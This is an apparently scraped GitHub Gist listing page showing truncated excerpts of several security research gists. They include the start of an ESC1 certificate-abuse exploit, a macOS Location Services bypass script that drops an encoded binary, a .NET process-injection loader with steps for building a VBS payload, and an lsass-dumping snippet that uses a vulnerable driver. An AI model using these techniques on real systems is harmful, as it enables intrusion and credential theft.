| title | updated | layout | category | prism_languages | intro | |
|---|---|---|---|---|---|---|
AppleScript |
2023-04-05 |
2017/sheet |
macOS |
|
AppleScript is a scripting language for automating macOS. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Original script and research by commial | |
| ### https://github.com/commial/experiments/tree/master/windows-defender | |
| ### Set LUADec_Path to binary | |
| ### https://github.com/viruscamp/luadec | |
| import struct | |
| import argparse | |
| import sys | |
| import os | |
| import io | |
| import subprocess |
SKaplanOfficial
/ AppleScriptCheatsheet.md
Created
April 5, 2023 23:47
Cheatsheet providing an overview of AppleScript's features.
Washi1337
/ DynamicLibrary.cpp
Last active
June 9, 2024 04:39
Injecting unconventional entry points in a .NET module. Blog post: https://washi.dev/blog/posts/entry-points/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <cstdio> | |
| #include <windows.h> | |
| VOID WINAPI TlsCallback(PVOID DllHandle, DWORD Reason, PVOID Reserved) | |
| { | |
| puts("[DynamicLibrary.dll]: TLS Callback"); | |
| } | |
| #ifdef _WIN64 | |
| #pragma comment (linker, "/INCLUDE:_tls_used") |
b4cktr4ck2
/ esc1.ps1
Created
February 22, 2023 21:50
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Thank you @NotMedic for troubleshooting/validating stuff! | |
| $password = Read-Host -Prompt "Enter Password" | |
| #^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
| $server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
| $CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
| $CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
| $CASERVER = "alexlab-dc01-ca" #CA name. | |
| $CA = $CAFQDN + "\" + $CASERVER |
theevilbit
/ cve_2022_22655_mount_locationd.sh
Last active
May 15, 2024 11:39
CVE-2022-22655 - macOS Location Services Bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/zsh | |
| echo "++ Stopping locationd" | |
| sudo launchctl stop com.apple.locationd | |
| echo "++ Dropping swiftliverpool" | |
| echo z/rt/gcAAAEDAAAAAgAAAB4AAACwDQAAhQAgAAAAAAAZAAAASAAAAF9fUEFHRVpFUk8AAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAA+AQAAF9fVEVYVAAAAAAAAAAAAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAUAAAAFAAAADwAAAAAAAABfX3RleHQAAAAAAAAAAAAAX19URVhUAAAAAAAAAAAAALAtAAABAAAAa0AAAAAAAACwLQAABAAAAAAAAAAAAAAAAAQAgAAAAAAAAAAAAAAAAF9fc3R1YnMAAAAAAAAAAABfX1RFWFQAAAAAAAAAAAAAHG4AAAEAAACiAAAAAAAAABxuAAABAAAAAAAAAAAAAAAIBACAAAAAAAYAAAAAAAAAX19zdHViX2hlbHBlcgAAAF9fVEVYVAAAAAAAAAAAAADAbgAAAQAAAB4BAAAAAAAAwG4AAAIAAAAAAAAAAAAAAAAEAIAAAAAAAAAAAAAAAABfX2NvbnN0AAAAAAAAAAAAX19URVhUAAAAAAAAAAAAAOBvAAABAAAALgEAAAAAAADgbwAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF9fc3dpZnQ1X3R5cGVyZWZfX1RFWFQAAAAAAAAAAAAADnEAAAEAAAAkAAAAAAAAAA5xAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX19vYmpjX21ldGhuYW1lAF9fVEVYVAAAAAAAAAAAAAAycQAAAQAAACwBAAAAAAAAMnEAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAABfX2NzdHJpbmcAAAAAAAAAX19UR |
tothi
/ DInjectQueuerAPC.cs
Last active
October 14, 2023 22:17
— forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /// Using with GadgetToJScript (e.g. for VBS payload): | |
| /// 1.) compile to DLL: c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:DInjectQueuerAPC.dll /r:System.Net.Http.dll DInjectQueuerAPC.cs | |
| /// 2.) generate VBS: GadgetToJScript.exe -w vbs -b -o DInjectQueuerAPC -a DInjectQueuerAPC.dll | |
| /// 3.) test: cscript.exe DInjectQueuerAPC.vbs | |
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| using System.Threading.Tasks; |
alfarom256
/ lel.cpp
Last active
June 1, 2023 17:49
dump lsass but in a weird way you probably shouldn't do in prod with a vulnerable driver
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <winternl.h> | |
| #include <stdio.h> | |
| #include <DbgHelp.h> | |
| #include "LenovoMemoryMgr.h" | |
| #pragma comment(lib, "dbghelp") | |
| typedef NTSTATUS(WINAPI* pNtQueryVirtualMemory)(HANDLE, PVOID, DWORD, PVOID, SIZE_T, PSIZE_T); |
LinusHenze
/ iOS_16_Launch_Constraints.txt
Created
June 15, 2022 16:30
Description of the Launch Constraints introduced in iOS 16
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| iOS 16 introduced launch constraints, which can be used to constraint the launch of an application. | |
| There are three types of constraints: | |
| Self Constraints, which the launched application itself must meet | |
| Parent Constraints, which the parent process must meet | |
| Responsible Constraints, which the "responsible process" must meet (I assume that the responsible process is the process that asked launchd to launch a service) | |
| Additionally, the TrustCache format was updated (see below) to support assigning each binary a "Constraint Category", which forces Self and Parent Constraints. | |
| Note that Self, Parent and Responsible Constraints can also be set by the process performing the launch and they can be included in the code signature, in the new blob type 0xFADE8181. In both cases, the constraints are DER encoded (just like the DER entitlements). | |
| Constraint Categories (from TrustCache, new in version 2): |
DavidBuchanan314
/ stegflate_decode.py
Last active
May 17, 2022 02:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import zlib | |
| import io | |
| import sys | |
| PNG_MAGIC = b"\x89PNG\r\n\x1a\n" | |
| def parse_png_chunk(stream): | |
| size = int.from_bytes(stream.read(4), "big") | |
| ctype = stream.read(4) | |
| body = stream.read(size) |
Wra7h
/ Get-ProcessPipes.ps1
Last active
May 3, 2024 00:41
Use PowerShell to get the PIDs associated with Named Pipes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-ProcessPipes{ | |
| param( | |
| [Parameter(Mandatory=$false)] | |
| [string]$CSV, | |
| [Parameter(Mandatory=$false)] | |
| [switch]$All | |
| ) | |
| Add-Type -TypeDefinition @" | |
| using System; |
NewerOlder